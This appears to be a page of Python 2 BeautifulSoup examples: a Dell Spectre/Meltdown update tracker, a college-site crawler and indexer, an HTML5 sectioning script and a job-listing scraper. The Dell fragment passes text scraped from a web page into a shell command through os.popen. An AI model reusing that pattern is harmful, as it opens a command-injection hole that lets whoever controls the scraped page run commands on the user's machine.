    'http://www.dell.com/support/article/de/de/debsdt1/sln308587/microprocessor-side-channel-vulnerabilities-cve-2017-5715-cve-2017-5753-cve-2017-5754-impact-on-dell-products?lang=en#Dell_Products_Affected'
).read()
soup = BeautifulSoup(page)
soup.prettify()
for row in soup.findAll('table')[1].findAll('tbody')[0].findAll('tr'):
    name = row.findAll('td')[0].text
    new_version = row.findAll('td')[1].text

    try:
        # if 1:
        # t =
        # print name
        line = os.popen("grep '%s' README.md" % name).read()
        old_version = line.split(" | ")[1].replace(" ", "").replace("\n", "")
        try:
            status = line.split(" | ")[3].split(" ")[0]
        except:
            status = "no"
        # print status
        if status == "no":
            if old_version != new_version and new_version != "In Process":
                # print old_version
                new_version_link = row.findAll('td')[1].findAll('a')[0]

                page_version = urllib2.urlopen(
                    'http:%s' % new_version_link['href']).read()
                soup_version = BeautifulSoup(page_version)
Example #32
def getLinks(i, limit):
    global j
    global visitedHash
    global JuLiDoTheThing
    global GlobalDictForWordFreq
    last = False
    while (i < limit):
        # if (i < limit):
        TempDictForWordFreq = dict()
        # This if statement writes to the file when the document counter is
        # divisible by 500.

        if (i % 500 == 0 and i != 0):
            print "I am going to write to the file because we've hit a mulitple of 500! WHOOOO!!!"
            writeToFile(last)

        ## This try catch block allows the file to be written to, even if the
        ## queue is empty, or the link is unable to be opened.
        ## TODO: Make sure that if the queue is empty, it isn't an infinite loop.

        try:
            # Get the next URL on the queue and open it
            url = linksQ.dequeue()
        except:
            print "The queue is empty!! Good for you!!"
            writeToFile(last)
            return

        if (delay):
            t0 = time.time()
            slowDown()
        try:
            # html = urllib.urlopen(url, timeout=4).read()
            html = urllib.urlopen(url).read()
            soup = BeautifulSoup(html)
        except:
            print "You couldn't open the URL:", url
            # i += 1
            # writeToFile(last)
            last = True
            # getLinks(i, limit)
            continue

        # print "Here is the url we are checking: " + url
        # print "When you try to get the visisted hash link file:", visitedHash.get(url, False)
        # print ""
        # If we have visited the URL before, do not find the links a second time
        if (visitedHash.get(url, False) != False):
            i += 1
            print "You've already been to " + str(i), url

            # Instead, move to the next url in the queue
            continue

        # If it is a new URL, find the links and tokens in the webpage
        else:
            for link in soup.findAll('a'):
                # Gets the new URLs for each webpage
                newLink = (link.get('href'))
                if (newLink != None):

                    # Check if the URL is absolute or relative
                    if (len(newLink) > 7
                            and (re.match(r"http\:\/\/", newLink[0:7])
                                 or re.match(r"https\:\/\/", newLink[0:8]))):
                        if (re.search(r"muhlenberg", newLink)):
                            if not (re.search(r"\#", newLink)):
                                try:
                                    ## Checks to make sure the the URLs being added
                                    ## are not PDF files.
                                    if not (re.match(r".*.pdf$", str(newLink))
                                            or re.match(
                                                r".*sync\.muhlenberg\.edu.*",
                                                str(newLink))
                                            or re.match(
                                                r".*capstone.*", str(newLink))
                                            or re.match(
                                                r".*blogs.*", str(newLink))
                                            or re.match(
                                                r"http://www.muhlenberg.edu\w+.html",
                                                str(newLink))):
                                        if not (re.match(
                                                r".*javascript.*",
                                                str(newLink)) or re.match(
                                                    r".*webapp.*",
                                                    str(newLink)) or re.match(
                                                        r".*edumailto.*",
                                                        str(newLink))):
                                            add = True
                                            for nope, value in evadeAndConquor.items(
                                            ):
                                                # print nope
                                                if re.search(
                                                        r".*" + nope + r".*",
                                                        str(newLink)):
                                                    add = False
                                                    # print "found it", nope
                                            if add:
                                                # If the link has not been visited before,
                                                # add it to the queue.
                                                if (visitedHash.get(
                                                        newLink,
                                                        False) == False):
                                                    linksQ.enqueue(newLink)
                                except:
                                    print "Your URL is not a string:", newLink

                    else:
                        if not (re.search(r"\#", newLink)):
                            ## TODO: MAKE SURE THIS WORKS FOR EVERY CASE.
                            end = url.find(r'/', 7)
                            newLink = url[0:end] + newLink
                            try:
                                ## Checks to make sure the the URLs being added
                                ## are not PDF files.
                                if not (re.match(r".*.pdf$", str(newLink)) or
                                        re.match(r".*sync\.muhlenberg\.edu.*",
                                                 str(newLink)) or
                                        re.match(r".*capstone.*", str(newLink))
                                        or re.match(r".*blogs.*", str(newLink))
                                        or re.match(
                                            r"http://www.muhlenberg.edu\w+.html",
                                            str(newLink))):
                                    if not (re.match(r".*javascript.*",
                                                     str(newLink))
                                            or re.match(
                                                r".*webapp.*", str(newLink)) or
                                            re.match(r".*edumailto.*",
                                                     str(newLink))):
                                        add = True
                                        for nope, value in evadeAndConquor.items(
                                        ):
                                            # print nope
                                            if re.search(
                                                    r".*" + nope + r".*",
                                                    str(newLink)):
                                                add = False
                                                # print "found it", nope
                                        if add:
                                            # If the link has not been visited before,
                                            # add it to the queue.
                                            if (visitedHash.get(
                                                    newLink, False) == False):
                                                linksQ.enqueue(newLink)
                            except:
                                print "Your URL is not a string:", newLink

            i += 1
            tempDoc = open("Files/Documents/doc" + str(i) + ".txt", 'w')
            for line in soup.prettify():
                tempDoc.write(line)

            tempDoc.close()
            # This will find all of the tokens in the file and store them in
            # a hash of tokens with their doc# and freq (TempDictForWordFreq) and
            # a hash of tokens and how many docs they appear in and which
            for line in soup.findAll('p'):
                if not line.find('iframe'):
                    line = line.text
                    if not (re.match(r"http\:\/\/.*", line)):
                        if (line != None):
                            words = line.split(' ')
                            for word in words:
                                if (re.search(
                                        r"\.([com]|[org]|[net]|[int]|[edu]|[gov])",
                                        word)):
                                    word = word.replace(word, "")
                                ## TODO: Maybe remove hypens?
                                # token = re.sub(r"and", "", word)
                                token = re.sub(r"&\w*;", "", word)
                                token = re.sub(r"[^A-Za-z\']*", "", token)
                                token = re.sub(r"[\t]", "", token)
                                token = token.lower()
                                if (token != "" and token != " "):
                                    if (stemWords):
                                        token = stemmer.lemmatize(token, 'v')
                                        token = stemmer.lemmatize(token, 'n')

                                    token = token.strip()

                                    if (len(token) > 1):
                                        if (removeStopWords):
                                            ## If the token isnt a stop word, add it.
                                            if (stopWords.get(token,
                                                              False) == False):
                                                if not re.search(
                                                        r'\r\n', token):
                                                    TempDictForWordFreq[
                                                        token] = int(
                                                            TempDictForWordFreq
                                                            .get(token, 0)) + 1
                                                    GlobalDictForWordFreq[
                                                        token] = int(
                                                            GlobalDictForWordFreq
                                                            .get(token, 0)) + 1

                                        else:
                                            TempDictForWordFreq[token] = int(
                                                TempDictForWordFreq.get(
                                                    token, 0)) + 1
                                            GlobalDictForWordFreq[token] = int(
                                                GlobalDictForWordFreq.get(
                                                    token, 0)) + 1

            j += 1
            i = j

            for key, val in TempDictForWordFreq.items():
                # print "current word", key
                # print "was it found in the perminate dictionary", JuLiDoTheThing.get(key, False) != False
                if (JuLiDoTheThing.get(key, False) != False):
                    FerricksList = JuLiDoTheThing.get(key, False)
                    FerricksList.append([i, val])
                    JuLiDoTheThing[key] = FerricksList
                else:
                    FerricksList = list()
                    FerricksList.append([i, val])
                    JuLiDoTheThing[key] = FerricksList

            # If we haven't visited the file before, add it to the visitedHash
            # if (visitedHash.get(url, False) == False):
            visitedHash[url.strip()] = i

            print "Document", i, "has been processed."
            last = False
Example #33
infile.close()

if options.replace:
  outfile = open(infilepath, 'w')
else:
  try:
    outfilepath = args[1]
  except IndexError:
    outfile = sys.stdout
  else:
    outfile = open(outfilepath, 'w')

soup = BeautifulSoup(inhtml)

parser = html5lib.HTMLParser(tree=treebuilders.getTreeBuilder("lxml"))
doc = parser.parse(soup.prettify())


"""
Convert headings to hgroups where appropriate
---------------------------------------------
"""

if options.hgroup:
  hgroupise(doc)
if options.section:
  sectionise(doc)
if options.normalize:
  normalize(doc)

"""
Example #34
import requests
from BeautifulSoup import BeautifulSoup

url = 'https://www.indeed.com/jobs?q=Entry-Level+Machine+Learning+&l=San+Francisco&radius=25'
response = requests.get(url)
html = response.content

soup = BeautifulSoup(html)
table = soup.find('tbody', attrs={'class': 'stripe'})
print soup.prettify()
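The same request with bs4 on Python 3, as a closing sketch (the 'stripe' class on the results table is taken from the snippet above and may not match the live page):

import requests
from bs4 import BeautifulSoup

url = 'https://www.indeed.com/jobs?q=Entry-Level+Machine+Learning+&l=San+Francisco&radius=25'
soup = BeautifulSoup(requests.get(url).content, 'html.parser')
table = soup.find('tbody', class_='stripe')
print(soup.prettify())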